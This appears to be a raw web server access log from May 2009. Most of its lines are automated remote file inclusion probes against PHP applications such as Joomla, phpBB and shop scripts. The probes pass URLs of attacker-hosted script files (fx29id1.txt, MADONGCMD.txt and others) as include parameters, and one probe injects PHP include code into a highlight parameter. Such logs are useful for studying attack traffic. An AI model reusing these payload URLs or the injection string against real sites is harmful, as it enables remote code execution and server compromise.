217.147.29.190 - - [19/May/2009:03:57:36 -0400] "GET /phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:36 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:36 -0400] "GET /logs/access_log.Q108090100%20%20/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:39 -0400] "GET /logs/access_log.Q108090100%20%20/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:39 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:57:39 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:57:40 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:57:40 -0400] "GET /logs/error_log.Q108033000%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:43 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:43 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:57:44 -0400] "GET /logs/error_log.Q108032900%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:46 -0400] "GET /phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:03:57:47 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:03:57:47 -0400] "GET /logs/access_log.Q108121000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:03:57:47 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:03:57:47 -0400] "GET /logs/access_log.Q109012300//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:49 -0400] "GET /logs/access_log.Q108110700%20%20/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:52 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:57:54 -0400] "GET /logs/access_log.Q108110700%20%20/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:03:58:05 -0400] "GET /logs/?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:03:58:05 -0400] "GET /logs/access_log.Q109051100%20%20/?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:03:58:05 -0400] "GET /?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:03:58:11 -0400] "GET /logs/access_log.Q109051200%20%20/?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:58:16 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:58:16 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:58:16 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:03:58:20 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:58:21 -0400] "GET //?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:58:21 -0400] "GET /logs//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
217.147.29.190 - - [19/May/2009:03:58:56 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:05 -0400] "GET /lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:59:05 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:05 -0400] "GET /logs/access_log.Q108110900/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:05 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:59:09 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:59:17 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:33 -0400] "GET /lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:33 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:03:59:33 -0400] "GET /logs/access_log.Q108110900/lostpasswd.php?env[include_prefix]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.206.91.16 - - [19/May/2009:03:59:43 -0400] "GET //index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.800"
218.249.36.194 - - [19/May/2009:04:00:01 -0400] "GET /logs/access_log.Q108090200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.143.98.5 - - [19/May/2009:04:00:13 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:13 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:13 -0400] "GET /logs/access_log.Q109050300//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:00:15 -0400] "GET /errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:00:15 -0400] "GET /logs/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:00:15 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:04:00:17 -0400] "GET /logs/access_log.Q109012300%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.145.50 - - [19/May/2009:04:00:17 -0400] "GET /logs/access_log.Q108121000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:17 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:17 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:17 -0400] "GET /logs/access_log.Q109050300//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:24 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:24 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:24 -0400] "GET /logs/access_log.Q109050700//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:24 -0400] "GET /logs/access_log.Q109050300//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:24 -0400] "GET /logs/access_log.Q109050700//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.246.20.221 - - [19/May/2009:04:00:24 -0400] "GET /logs/access_log.Q108102400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.246.20.221 - - [19/May/2009:04:00:24 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:28 -0400] "GET /logs/access_log.Q109050700//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:00:35 -0400] "GET /logs/access_log.Q109030500/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:40 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:40 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:40 -0400] "GET /logs/access_log.Q109050300%20%20//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:43 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:43 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:00:43 -0400] "GET /logs/access_log.Q109050300%20%20//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:04:00:48 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:00:48 -0400] "GET //?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:00:48 -0400] "GET /logs//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
72.30.142.171 - - [19/May/2009:04:00:51 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [19/May/2009:04:00:52 -0400] "GET /logs/error_log.Q107060700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.246.20.221 - - [19/May/2009:04:01:02 -0400] "GET /logs/access_log.Q108111500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:04:01:26 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:04:01:26 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:04:01:26 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:01:39 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:01:39 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:01:40 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
217.147.29.190 - - [19/May/2009:04:01:45 -0400] "GET /logs/access_log.Q108110700%20%20/phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.246.20.221 - - [19/May/2009:04:01:45 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
194.126.110.134 - - [19/May/2009:04:01:49 -0400] "GET /logs/access_log.Q109051100/shop/main.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
194.126.110.134 - - [19/May/2009:04:01:49 -0400] "GET /logs/shop/main.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
194.126.110.134 - - [19/May/2009:04:01:49 -0400] "GET /shop/main.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:04:02:06 -0400] "GET /logs/access_log.Q109032800//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
207.44.232.81 - - [19/May/2009:04:02:15 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:02:15 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:02:15 -0400] "GET /logs/access_log.Q108081100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
220.181.7.97 - - [19/May/2009:04:02:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.28.103.46 - - [19/May/2009:04:02:31 -0400] "GET /admin/admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:04:02:31 -0400] "GET /logs/admin/admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:04:02:31 -0400] "GET /logs/access_log.Q109051100/admin/admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:02:32 -0400] "GET /logs/access_log.Q109011800%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:04:02:35 -0400] "GET /logs/access_log.Q109032800//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:04:02:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.191.102.117 - - [19/May/2009:04:03:03 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:04:03:03 -0400] "GET /logs/access_log.Q109042200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.135.148.59 - - [19/May/2009:04:03:14 -0400] "GET //index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
123.125.64.38 - - [19/May/2009:04:03:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.191.102.117 - - [19/May/2009:04:03:25 -0400] "GET /logs/access_log.Q108091100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
217.18.76.16 - - [19/May/2009:04:04:06 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:04:04:06 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:04:04:06 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:04:04:41 -0400] "GET /logs/access_log.Q109032800//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:04:04:43 -0400] "GET //authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:04:43 -0400] "GET /logs/access_log.Q109050300//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:04:43 -0400] "GET /logs//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:04:43 -0400] "GET /logs/access_log.Q109050700//authentication/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:04:59 -0400] "GET /errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:04:59 -0400] "GET /logs/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:04:59 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:05:13 -0400] "GET /logs/access_log.Q109021400/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:05:23 -0400] "GET /logs/access_log.Q108090500%20%20/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:05:24 -0400] "GET /logs/access_log.Q108081600%20%20/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:04:05:26 -0400] "GET /logs/access_log.Q109051100%20%20/admin/admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:05:42 -0400] "GET /errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:05:42 -0400] "GET /logs/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:05:42 -0400] "GET /logs/error_log.Q109050500%20%20/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:05:53 -0400] "GET /logs/access_log.Q109021400%20%20/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:04:05:56 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:04:05:56 -0400] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:04:05:56 -0400] "GET /logs/access_log.Q108111500%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:04:06:48 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.249.36.194 - - [19/May/2009:04:06:48 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
87.106.135.14 - - [19/May/2009:04:06:48 -0400] "GET //?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:06:49 -0400] "GET /logs//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
